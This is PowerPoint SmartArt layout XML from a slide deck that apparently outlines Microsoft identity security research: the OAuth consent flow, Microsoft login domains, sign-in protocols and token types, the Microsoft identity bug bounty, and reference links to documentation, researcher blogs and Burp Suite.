        <a:xfrm>
          <a:off x="259677" y="3413989"/>
          <a:ext cx="472141" cy="4721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BB823-4F66-4FE7-9B14-7CA50C653A0D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="991497" y="3220840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991497" y="3220840"/>
        <a:ext cx="9524102" cy="8584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7E761-ED8A-42D1-88A4-171BA13E7921}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="40153"/>
          <a:ext cx="6513603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1: Some app requests Oauth access to a user's account </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="84655" y="124808"/>
        <a:ext cx="6344293" cy="1564849"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{53E20593-A6D6-4A1E-A82D-FD89DB236E3A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1863593"/>
          <a:ext cx="6513603" cy="17341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2: User approves or rejects </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="84655" y="1948248"/>
        <a:ext cx="6344293" cy="1564849"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4CBE3FB3-B50D-4CB0-AA4B-0DD468E43BCE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3597752"/>
          <a:ext cx="651360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Some apps are “preauthorized”</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3597752"/>
        <a:ext cx="6513603" cy="513360"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2CA924AA-3EF8-49B1-8102-0E213F488B94}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4111112"/>
          <a:ext cx="6513603" cy="17341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3: App receives a magic delegation token and access resource on User’s behalf</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="84655" y="4195767"/>
        <a:ext cx="6344293" cy="15648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2B52B-C21C-4CE8-9A13-EB0D97E81E2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="152127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login.windows.net</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="176715"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A70D02A2-4EAD-4ED9-9245-3523013A27A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="716292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login.microsoftonline.com</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="740880"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8B2EA5D1-6A55-4120-8EFE-55F678EB0460}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1280457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login.live.com</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="1305045"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8AE191CF-738F-4394-B892-4889656B4E6B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1844622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account.live.com</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="1869210"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3164AFEA-44ED-4F3F-A28D-69DAE11CEE64}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2408787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account.windowsazure.com</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="2433375"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3C96BD6A-922B-492E-9BAF-1F2C6E4E8DFE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2972952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account.activedirectory.windowsazure.com</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="2997540"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{14A0AD6D-2E15-4748-A301-47CF80AC7D56}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3537118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credential.activedirectory.windowsazure.com</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="3561706"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{636FD81F-F12E-4637-BEA5-CD949136F053}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4101283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portal.office.com</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="4125871"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7CC3005C-8042-45C4-B29B-C9213E3F5810}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4665447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passwordreset.microsoftonline.com</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="4690035"/>
        <a:ext cx="6464427" cy="454509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{39FE06F5-6607-41BE-80F5-8793E0934237}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5229613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Microsoft Authenticator (iOS and Android applications)* </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24588" y="5254201"/>
        <a:ext cx="6464427" cy="4545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0F0A5-2849-438D-94EB-5A06F9724252}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="304857"/>
          <a:ext cx="6513603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u="none" kern="1200" dirty="0"/>
            <a:t>Bounty</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2200" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25759" y="330616"/>
        <a:ext cx="6462085" cy="476152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5C957B5B-EF00-4F5A-9B88-0FCCF6D1DA9F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="832528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https://www.microsoft.com/en-us/msrc/bounty-microsoft-identity</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="832528"/>
        <a:ext cx="6513603" cy="364320"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FECA41C5-644D-40D5-AE58-D9184AA13B22}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1196847"/>
          <a:ext cx="6513603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Identity documentations:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25759" y="1222606"/>
        <a:ext cx="6462085" cy="476152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FAAF1DFE-7801-43EC-B237-17844554692D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1724518"/>
          <a:ext cx="6513603" cy="159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https://blogs.technet.microsoft.com/askpfeplat/2014/11/02/adfs-deep-dive-comparing-ws-fed-saml-and-oauth/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https://docs.microsoft.com/en-us/azure/active-directory/develop/about-microsoft-identity-platform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https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-overview</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1724518"/>
        <a:ext cx="6513603" cy="1593900"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BF1FE438-EF30-4C3E-B69D-FE46BDE091A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3318418"/>
          <a:ext cx="6513603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Researcher Blogs:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25759" y="3344177"/>
        <a:ext cx="6462085" cy="476152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C124586E-9E84-476C-B7A5-607DA2F328F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3846088"/>
          <a:ext cx="6513603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https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/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https://www.synack.com/blog/how-i-hacked-hotmail/</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3846088"/>
        <a:ext cx="6513603" cy="842490"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{807F0A2D-EAB9-4CF5-8AB6-E95CC03BDF48}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4688578"/>
          <a:ext cx="6513603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Tools</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25759" y="4714337"/>
        <a:ext cx="6462085" cy="476152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{70A76553-85D8-41E5-8500-2D684BD87C30}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5216247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https://portswigger.net/burp/</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="5216247"/>
        <a:ext cx="6513603" cy="36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6A712-3398-4E58-A9E2-9E935E2FB61E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1138979" y="106834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E9F9E-978B-44E4-AD16-6F1F85327985}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="569079" y="22926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Web</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="569079" y="2292631"/>
        <a:ext cx="2072362" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{85BFEA7F-F088-4A2D-BC70-46DB8033B49E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3574005" y="106834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8AE40-3B9F-48FF-A32C-CF70A2ED7D71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3004105" y="22926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Mobile</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3004105" y="2292631"/>
        <a:ext cx="2072362" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{500841D7-938C-4F83-AC87-B81ED31F8D3C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6009031" y="106834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7C987-BEAB-41DF-818E-814A220A7271}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5439131" y="22926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IoT Devices</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5439131" y="2292631"/>
        <a:ext cx="2072362" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B857A527-B632-41C5-BDC3-495914FA3931}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8444057" y="1068342"/>
          <a:ext cx="932563" cy="932563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E8F23-855B-49F6-B29D-E681DCA0898B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7874157" y="22926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…</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7874157" y="2292631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824EA-AEB8-4566-B9C9-E50F58D7F8EF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="679050" y="442986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85B49-986A-49B9-865E-BE18AE47255E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1081237" y="845174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772C1-E379-4EAB-BBBE-301298DD05A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="75768" y="291798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Sign-in Protocol</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="75768" y="2917987"/>
        <a:ext cx="3093750" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FEA68064-884F-4A63-84FE-4AF4401C135F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4314206" y="442986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5FA0B-F4FA-4C18-904A-97D3C064C363}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4716393" y="845174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A14DE-9CB5-49C7-BF63-237D1AC39E96}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3710925" y="291798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Authentication Protocol</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3710925" y="2917987"/>
        <a:ext cx="3093750" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CA354273-B74A-4291-8F6C-42D8F8BA8589}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7949362" y="442986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FCECA-E3E2-4BDE-BD7E-0DD9F0DF8EB3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8351550" y="845174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FFADF-2679-426C-B41B-DCA317CD6F9F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7346081" y="291798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Token Type</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7346081" y="2917987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EB074-00A2-4CE5-87FD-F09449E92678}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="726455" y="4816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55352-A157-4124-81A3-9D3E60D36413}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1128643" y="407003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C4EB1-DA81-4804-8D2B-C465F8DA3E97}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="123174" y="247981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Sign-in Protocol</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="123174" y="2479816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A759C-FF99-46A0-B7B2-9BA78096698A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-4960687" y="-760103"/>
          <a:ext cx="5908015" cy="5908015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BAE4B-8178-46A0-97C0-DA467EE38F19}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="496073" y="337334"/>
          <a:ext cx="4476523" cy="6750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>
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>WS-FED</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="496073" y="337334"/>
        <a:ext cx="4476523" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B69DCF54-2D9D-4535-9929-670416E84C0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74185" y="252957"/>
          <a:ext cx="843775" cy="843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2D4BF-A371-43F1-BD47-FA648C912FD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="883078" y="1350041"/>
          <a:ext cx="4089519" cy="6750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>
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>SAML</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="883078" y="1350041"/>
        <a:ext cx="4089519" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="461190" y="1265663"/>
          <a:ext cx="843775" cy="843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F507D-12BB-42FA-A84E-AE57235F61F1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="883078" y="2362747"/>
          <a:ext cx="4089519" cy="6750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>
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>OAUTH</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="883078" y="2362747"/>
        <a:ext cx="4089519" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="461190" y="2278369"/>
          <a:ext cx="843775" cy="843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AA8A7-7676-41BA-88B5-2ED6FE864CCA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="496073" y="3375453"/>
          <a:ext cx="4476523" cy="6750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>
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>…</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="496073" y="3375453"/>
        <a:ext cx="4476523" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8F5CCB78-D749-4F80-8312-407E61B052D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74185" y="3291076"/>
          <a:ext cx="843775" cy="843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AA48F-C0D2-463C-9C60-0883B0A7ACD5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="871893" y="11716"/>
          <a:ext cx="1818562" cy="1818562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38118-436A-4C8D-BBD8-1ECBF6D41F1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1259456" y="39927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ED347-A0EA-402A-B1CC-DA827E7BC03B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="290550" y="239671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Authentication Protocol</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="290550" y="2396716"/>
        <a:ext cx="298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A759C-FF99-46A0-B7B2-9BA78096698A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-4960687" y="-760103"/>
          <a:ext cx="5908015" cy="5908015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BAE4B-8178-46A0-97C0-DA467EE38F19}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="496073" y="337334"/>
          <a:ext cx="4476523" cy="6750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Form based</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="496073" y="337334"/>
        <a:ext cx="4476523" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B69DCF54-2D9D-4535-9929-670416E84C0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74185" y="252957"/>
          <a:ext cx="843775" cy="843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2D4BF-A371-43F1-BD47-FA648C912FD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="883078" y="1350041"/>
          <a:ext cx="4089519" cy="6750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Kerberos</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="883078" y="1350041"/>
        <a:ext cx="4089519" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="461190" y="1265663"/>
          <a:ext cx="843775" cy="843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F507D-12BB-42FA-A84E-AE57235F61F1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="883078" y="2362747"/>
          <a:ext cx="4089519" cy="6750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OpenID</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="883078" y="2362747"/>
        <a:ext cx="4089519" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="461190" y="2278369"/>
          <a:ext cx="843775" cy="843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97499-02B0-4D57-BAD1-CC21EF7072FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="496073" y="3375453"/>
          <a:ext cx="4476523" cy="6750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…</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="496073" y="3375453"/>
        <a:ext cx="4476523" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{792F66F8-49DF-49C4-A2C8-AC432EDDED38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74185" y="3291076"/>
          <a:ext cx="843775" cy="843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F0D11-7983-4AAB-B50C-9BBF419824BB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1026856" y="2741"/>
          <a:ext cx="1749937" cy="1749937"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse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81DA8-1874-46F1-90EF-7BF6AB340F08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1399793" y="375679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900A7-0133-4D15-9DEE-1B8B65FE6D24}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="467450" y="22977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Token Type</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="467450" y="2297741"/>
        <a:ext cx="2868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A759C-FF99-46A0-B7B2-9BA78096698A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-4960687" y="-760103"/>
          <a:ext cx="5908015" cy="5908015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BAE4B-8178-46A0-97C0-DA467EE38F19}">
      <dsp:nvSpPr>
